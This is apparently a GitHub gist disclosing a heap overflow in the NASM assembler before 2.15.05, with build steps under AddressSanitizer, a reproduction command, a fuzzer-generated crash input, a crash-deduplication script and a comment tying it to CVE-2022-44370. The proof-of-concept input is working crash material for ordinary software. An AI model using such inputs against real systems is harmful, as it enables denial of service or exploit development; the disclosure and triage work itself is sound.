@naihsin
Last active August 24, 2023 18:09
Nasm heap overflow

Nasm version

  • <2.15.05

Compile Target

  • Download the source: wget https://www.nasm.us/pub/nasm/releasebuilds/2.15.05/nasm-2.15.05.tar.gz
  • Decompress the source code: tar xvf nasm-2.15.05.tar.gz
  • Set up the compiler flags and enable the sanitizer option:
    cd nasm-2.15.05
    export CC=/usr/bin/gcc
    export CXX=/usr/bin/g++
    export CFLAGS="-g -fsanitize=address"
    ./configure --prefix=/usr/
  • Build and install: sudo make install
  • Check the version: ./nasm -v


How I found the vulnerability

I used a fuzzer I crafted myself, and then I found a crash.

I reproduced the vulnerability with this PoC.

./nasm -t -Z/dev/null -g -O0 -o /dev/null -M -f bin ./poc

AddressSanitizer showed there is a heap overflow bug here.

;/07K0.bin
7rep 5
db 0
in
7rep 5
db 0
includ90790_i.am"
ludg?"Gnc2?a
le "incc2I.bin
7?ude "inc2.a
lude "inc2..bin
7repccepcccccctccccccNcccccccccccccc?ccacc
dccc??ccccccccccccccccccccccccccccc.bin
7repcccccctccccccccccccccccccccccaccccccc????cccccccccccc00000000000000000000cccHccccccccccccccccccc 5
db
0
%include "bde "inl2.a
lude %defineM?cd "br890790_iam"
lude "inc2m"
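When a fuzzer turns up a crash like this one, the first triage step is to reduce the ASan report to a stable bucket key so the finding can be compared against already-reported bugs before filing. The script below is an added example, not code from the gist or from the NASM project: it parses a constructed AddressSanitizer report (all addresses, function names and paths in it are placeholders, not real NASM identifiers) and derives a signature from the bug class plus the top in-project frames of the faulting stack.

```python
import re
from dataclasses import dataclass, field

# Constructed sample report; not the gist author's ASan output. Frame names,
# source paths and addresses are placeholders, not real NASM identifiers.
SAMPLE_REPORT = """\
==4242==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000018 at pc 0x55aa00001000 bp 0x7ffc00000100 sp 0x7ffc000000f0
READ of size 1 at 0x602000000018 thread T0
    #0 0x55aa00001000 in placeholder_frame_a /src/nasm-2.15.05/asm/placeholder_a.c:100
    #1 0x55aa00002000 in placeholder_frame_b /src/nasm-2.15.05/asm/placeholder_b.c:200
    #2 0x55aa00003000 in main /src/nasm-2.15.05/asm/placeholder_main.c:300
    #3 0x7f0000001000 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29d90)
0x602000000018 is located 0 bytes to the right of 8-byte region [0x602000000010,0x602000000018)
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/nasm-2.15.05/asm/placeholder_a.c:100 in placeholder_frame_a
"""

ERROR_RE = re.compile(r"ERROR: AddressSanitizer: (?P<bug>[\w-]+) on address")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+)", re.M)
FRAME_RE = re.compile(r"^\s+#(?P<n>\d+) 0x[0-9a-f]+ in (?P<func>\S+) (?P<loc>\S+)")

@dataclass
class Crash:
    bug_type: str
    access: str                                 # "READ" or "WRITE"
    size: int                                   # access size in bytes
    frames: list = field(default_factory=list)  # (function, location) of the faulting stack

def parse_asan_report(text: str) -> Crash:
    """Extract bug class, access kind/size and the faulting stack (first stack block only)."""
    bug, acc = ERROR_RE.search(text), ACCESS_RE.search(text)
    if not bug or not acc:
        raise ValueError("not an AddressSanitizer memory-access report")
    # The faulting stack is the run of frame lines right after the READ/WRITE line;
    # stop at the first non-frame line so the allocation/free stacks are not mixed in.
    frames = []
    for line in text[acc.end():].splitlines()[1:]:
        m = FRAME_RE.match(line)
        if not m:
            if frames:
                break
            continue
        frames.append((m["func"], m["loc"]))
    return Crash(bug["bug"], acc["op"], int(acc["size"]), frames)

def crash_signature(crash: Crash, project_root: str, depth: int = 3) -> str:
    """Bucket key for de-duplicating crashes: bug class plus the top in-project frames.
    Frames outside project_root (libc, sanitizer runtime) are skipped; file:line is kept
    so a different overflow site in the same function is not collapsed into this bucket."""
    in_project = [f"{func}@{loc[len(project_root) + 1:]}"
                  for func, loc in crash.frames if loc.startswith(project_root)]
    return "|".join([crash.bug_type, *in_project[:depth]])
```

Two reports with the same signature are strong duplicate candidates; a matching bug class with a different top frame usually deserves its own report.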

szarkos commented Aug 24, 2023

This appears to be a duplicate of https://bugzilla.nasm.us/show_bug.cgi?id=3392815 (CVE-2022-44370).

I would suggest trying to repro with the latest dev branch, or test with the patch from the above bug report (netwide-assembler/nasm@2d4e695).
